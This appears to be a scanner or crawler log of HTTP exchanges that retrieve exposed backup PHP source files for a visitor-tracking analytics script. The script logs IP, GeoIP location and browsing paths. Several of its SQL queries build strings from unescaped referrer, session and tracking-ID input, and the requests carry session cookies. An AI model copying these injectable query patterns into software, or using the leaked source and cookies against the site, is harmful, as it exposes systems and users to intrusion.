// If we have an internal hit, and internal tracking is not explicitly allowed
// we bail out now
if ($internalHit && !$allowInternalTracking) {
die('//NIT');
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = (int)$domainIdData->ID;
}
}

// We're done if the domain isn't found.
if ($domainId == 0) {
die("//DNR\n");
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
//echo "//$campaign->Title \n";
$campaignId = $campaign->ID;

// Get all the triggers for the campaign
$triggerResults = $dbConnection->query(
"SELECT * FROM `campaign_triggers` WHERE `Active` = '1' AND `CampaignID` = '$campaignId'"
);

while($trigger = $triggerResults->fetch_object()) {
//echo "// ($campaign->IdentifierType)\n";

if ($trigger->IdentifierType == 'Parameter') {
// Parameter-based campaign
//echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($trigger->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$trigger->ParameterToCheck])) {
if ($parameters[$trigger->ParameterToCheck] == $trigger->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
//echo "//Matched\n";
$matchedCampaigns[] = $campaignId;
}
} else if ($trigger->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($trigger->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($trigger->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheckNoQuery = $in_referrerNoQuery;
} else {
continue;
}

if ($trigger->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
}
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$safeTitle = $dbConnection->escape_string($in_title);
$safeCurrentUrl = $dbConnection->escape_string($currentUrl);
$safeReferrer = $dbConnection->escape_string($in_referrer);

$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$safeReferrer'), '$safeCurrentUrl', '$safeTitle',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
ConvertDomainNameToDomainId(DomainNameFromURL('$safeCurrentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2009_03_18_r1

/blvdstatus/js/dynamicJS.php_2009_03_18_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2009_03_18_r1

Request

GET /blvdstatus/js/dynamicJS.php_2009_03_18_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:17 GMT
Server: Apache
Last-Modified: Wed, 10 Sep 2008 15:32:40 GMT
ETag: "2548019-2e08-4568c5cd95600"
Accept-Ranges: bytes
Content-Length: 11784
Keep-Alive: timeout=15, max=89
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

import_request_variables('g', 'in_');

// Determine if internal tracking is allowed
if (isset($in_ait) && $in_ait == 'true') {
$allowInternalTracking = true;
} else {
$allowInternalTracking = false;
}

if (isset($in_tid) && $in_tid != 0) {
$trackingId = $in_tid;
} else {
$trackingId = '';
}

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Find out if we are hitting an internal page
if (strpos($currentUrl, 'blvdstatus.com') !== false) {
$internalHit = true;
} else {
$internalHit = false;
}

echo "//TID: $trackingId \n";
echo "//IH: $internalHit / $allowInternalTracking \n";

// If we have an internal hit, and internal tracking is not explicitly allowed
// we bail out now
if ($internalHit && !$allowInternalTracking) {
die('//NIT');
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

// If we had a tracking ID, this is just a lookup, otherwise
// we actually translate the domain name into an ID as best we can
if ($trackingId == '') {
echo "//DLU\n";
$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);
} else {
echo "//DFT\n";
$domainIdResults = $dbConnection->query(
"SELECT `ID` FROM `domains` WHERE `TrackingID` = '$trackingId'"
);
}

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = (int)$domainIdData->ID;
}
}

// We're done if the domain isn't found.
if ($domainId == 0) {
die("//DNR\n");
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
//echo "//$campaign->Title \n";
$campaignId = $campaign->ID;

// Get all the triggers for the campaign
$triggerResults = $dbConnection->query(
"SELECT * FROM `campaign_triggers` WHERE `Active` = '1' AND `CampaignID` = '$campaignId'"
);

while($trigger = $triggerResults->fetch_object()) {
//echo "// ($campaign->IdentifierType)\n";

if ($trigger->IdentifierType == 'Parameter') {
// Parameter-based campaign
//echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($trigger->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$trigger->ParameterToCheck])) {
if ($parameters[$trigger->ParameterToCheck] == $trigger->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
//echo "//Matched\n";
$matchedCampaigns[] = $campaignId;
}
} else if ($trigger->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($trigger->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($trigger->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheckNoQuery = $in_referrerNoQuery;
} else {
continue;
}

// [CB] Modified on 8/22/2008 to handle "partial matches"
// and to ensure case-insensitivity
if ($trigger->IgnoreQueryString == '1') {
$urlToCheck = strtolower($urlToCheckNoQuery);
} else {
$urlToCheck = strtolower($urlToCheck);
}

if ((int)($trigger->PartialMatch) == '1') {
if (stristr($urlToCheck, $trigger->URL) !== false) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == strtolower($trigger->URL)) {
$matchedCampaigns[] = $campaignId;
}
}

/*
if ($trigger->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
}
*/
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}
echo "//BLVDC: $in_blvdC\n\n";

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$safeTitle = $dbConnection->escape_string($in_title);
$safeCurrentUrl = $dbConnection->escape_string($currentUrl);
$safeReferrer = $dbConnection->escape_string($in_referrer);

$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$safeReferrer'), '$safeCurrentUrl', '$safeTitle',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
ConvertDomainNameToDomainId(DomainNameFromURL('$safeCurrentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/initBlvdJS.php_2008_08_12_r1

/blvdstatus/js/initBlvdJS.php_2008_08_12_r1

http://www.seoq.com/blvdstatus/js/initBlvdJS.php_2008_08_12_r1

Request

GET /blvdstatus/js/initBlvdJS.php_2008_08_12_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:17 GMT
Server: Apache
Last-Modified: Wed, 30 Jul 2008 14:41:57 GMT
ETag: "2548023-ff4-4533ec2231740"
Accept-Ranges: bytes
Content-Length: 4084
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

?>

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
*/
function URLEncode (clearString) {
var output = '';
var x = 0;
clearString = clearString.toString();
var regex = /(^[a-zA-Z0-9_.]*)/;
while (x < clearString.length) {
var match = regex.exec(clearString.substr(x));
if (match != null && match.length > 1 && match[1] != '') {
output += match[1];
x += match[1].length;
} else {
if (clearString[x] == ' ')
output += '%20';
else {
var charCode = clearString.charCodeAt(x);
var hexVal = charCode.toString(16);
output += '%' + ( hexVal.length < 2 ? '0' : '' ) + hexVal.toUpperCase();
}
x++;
}
}

return output;
}

/*
* Cookie functions -- taken from:
* http://www.quirksmode.org/js/cookies.html
*/
function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Cookie functions -- modified from:
* http://www.quirksmode.org/js/cookies.html
*/
function createShortTermCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Returns the value of the named cookie, or null if no such cookie
* exists.
*/
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

/*
* Deletes the specified cookie.
*/
function eraseCookie(name) {
createCookie(name,"",-1);
}

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (object && typeof(object) == 'function');
}

/*
* The afterLoad function, which is responsible for triggering the
* dynamic JavaScript pull.
*/
function afterLoad() {
// We call all the existing onload functions _first_,
// in the hope that if they modify the document we
// will catch the changes.
if (isFunction(chain_onload)) {
chain_onload();
}

// Check and see if we have a BLVD session cookie,
// if so, maintain that session value. If not, a session
// value will be generated by the PHP script.
var blvdSessionId = readCookie("blvdSessionId");
if (blvdSessionId == null) blvdSessionId = '';

// Generate the dynamic javascript tag
var scriptTag = document.createElement("script");
scriptTag.src =
"<?php echo DYNAMIC_URL_BASE; ?>js/dynamicJS.php" +
"?blvdSessionId=" + blvdSessionId +
"&referrer=" + URLEncode(document.referrer) +
"&title=" + URLEncode(document.title) +
"&screenWidth=" + screen.width +
"&screenHeight=" + screen.height +
"&screenDepth=" + screen.colorDepth
;

var bodyNode = document.getElementsByTagName("body")[0];
bodyNode.appendChild(scriptTag);
}

/*
* Chain the BLVD afterLoad function into the OnLoad event handler.
* We store the current OnLoad handler first so we can call it
* from our own function.
*/

if (isFunction(window.addEventListener)) {
window.addEventListener('load', afterLoad, false);
} else if (isFunction(window.attachEvent)) {
window.attachEvent('load', afterLoad);
} else {
var chain_onload = window.onload;
window.onload = afterLoad;
}

- /blvdstatus/js/dynamicJS.php_2009_04_13_r1

/blvdstatus/js/dynamicJS.php_2009_04_13_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2009_04_13_r1

Request

GET /blvdstatus/js/dynamicJS.php_2009_04_13_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:17 GMT
Server: Apache
Last-Modified: Wed, 18 Mar 2009 07:46:46 GMT
ETag: "254801a-2ca8-4655fe2ab0580"
Accept-Ranges: bytes
Content-Length: 11432
Keep-Alive: timeout=15, max=90
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

import_request_variables('g', 'in_');

// Determine if internal tracking is allowed
if (isset($in_ait) && $in_ait == 'true') {
$allowInternalTracking = true;
} else {
$allowInternalTracking = false;
}

if (isset($in_tid) && $in_tid != 0) {
$trackingId = $in_tid;
} else {
$trackingId = '';
}

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Find out if we are hitting an internal page
if (strpos($currentUrl, 'blvdstatus.com') !== false) {
$internalHit = true;
} else {
$internalHit = false;
}

echo "//TID: $trackingId \n";
echo "//IH: $internalHit / $allowInternalTracking \n";

// If we have an internal hit, and internal tracking is not explicitly allowed
// we bail out now
if ($internalHit && !$allowInternalTracking) {
die('//NIT');
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

// If we had a tracking ID, this is just a lookup, otherwise
// we actually translate the domain name into an ID as best we can
if ($trackingId == '') {
echo "//DLU\n";
$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);
} else {
echo "//DFT\n";
$domainIdResults = $dbConnection->query(
"SELECT `ID` FROM `domains` WHERE `TrackingID` = '$trackingId'"
);
}

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = (int)$domainIdData->ID;
}
}

// We're done if the domain isn't found.
if ($domainId == 0) {
die("//DNR\n");
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
